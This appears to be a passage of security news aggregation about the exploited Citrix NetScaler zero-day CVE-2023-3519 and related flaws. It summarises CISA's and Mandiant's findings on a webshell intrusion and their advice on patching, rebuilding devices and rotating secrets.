Ransomware gangs, including REvil and DoppelPaymer, have taken advantage of similar Citrix Netscaler ADC and Gateway vulnerabilities to breach corporate networks in past attacks.
This highlights the pressing need for security teams to make patching Citrix servers a top priority on their to-do lists.
Wed, 02 Aug 2023 19:45:00 -0500, Sergiu Gatlan, https://www.bleepingcomputer.com/news/security/over-640-citrix-servers-backdoored-with-web-shells-in-ongoing-attacks/
Citrix NetScaler users told to patch new zero-day urgently
A zero-day vulnerability in Citrix NetScaler Application Delivery Controller (ADC) and Citrix NetScaler Gateway appears to be under active exploitation by an unspecified advanced persistent threat (APT) actor backed by the Chinese government and should be patched immediately.
Per Citrix’s initial advisory released on Tuesday 18 July, the three vulnerabilities patched by Citrix affect multiple versions of the NetScaler ADC (previously Citrix ADC) and NetScaler Gateway (previously Citrix Gateway) lines.
They are tracked as CVE-2023-3466, a reflected cross-site scripting flaw; CVE-2023-3467, a privilege escalation vulnerability; and CVE-2023-3519, an unauthenticated remote code execution (RCE) bug.
Of these, the issue of concern is the RCE vulnerability, CVE-2023-3519, which carries a CVSS score of 9.8, and it is this bug that was added to the US Cybersecurity and Infrastructure Security Agency’s (CISA’s) Known Exploited Vulnerabilities (KEV) list on 20 July.
The addition of a vulnerability to the KEV list requires US government bodies to address it by a set date. It carries no formal weight beyond this, but inclusion on the list is a sure sign that all organisations should pay attention.
According to CISA, the threat actor exploited CVE-2023-3519 to drop a webshell on a non-production NetScaler ADC appliance owned by an operator of critical national infrastructure (CNI).
Using this webshell, the actor then attempted to perform discovery actions on the victim's Active Directory (AD) and exfiltrate data from it. They then tried to move laterally to a domain controller, but were thwarted in this instance when the appliance's network-segmentation controls blocked the movement.
In this instance, the victim organisation was able to swiftly identify the compromise and duly reported the incident to both CISA and Citrix.
Assessing the impact of CVE-2023-3519, researchers at Mandiant, which played a key role in the initial investigation, said that ADC devices present a tempting target: they are predominantly used in the IT sector and form a vital component of enterprise cloud datacentres, where they ensure the optimal delivery of enterprise applications.
However, wrote the analyst team, comprising James Nugent, Foti Castelan, Doug Bienstock, Justin Moore and Josh Murchie, Chinese threat actors often target devices that sit at the edge of the network because they can be harder to monitor, and very often don’t support intrusion detection solutions.
“Mandiant cannot attribute this activity based on the evidence collected thus far,” the team wrote. “However, this type of activity is consistent with previous operations by China-nexus actors based on known capabilities and actions against Citrix ADCs in 2022.
“The evolution of the China-nexus cyber threat landscape has evolved to such an extent that its ecosystem mirrors more closely that of financial crime clusters, with connections and code overlap not necessarily offering the comprehensive picture.”
Beyond applying the patch, Mandiant is additionally recommending that if any affected appliances are found to have been exploited, they should be rebuilt immediately. This upgrade process will overwrite some, but not all, of the directories where threat actors may drop webshells.
Security teams may also wish to re-evaluate whether or not their ADC or Gateway appliances’ management ports need unrestricted internet access, and limit access to only necessary IP addresses, which would make post-exploitation activities harder going forward.
Based on some of the other tactics, techniques and procedures (TTPs) outlined in Mandiant's write-up, the research team is also recommending that affected organisations rotate all secrets stored in the configuration file, along with any private keys or certificates usable for transport layer security (TLS) connections.
They may also wish to harden susceptible accounts in the domain to protect against credential exposure and limit a threat actor’s ability to obtain credentials for lateral movement.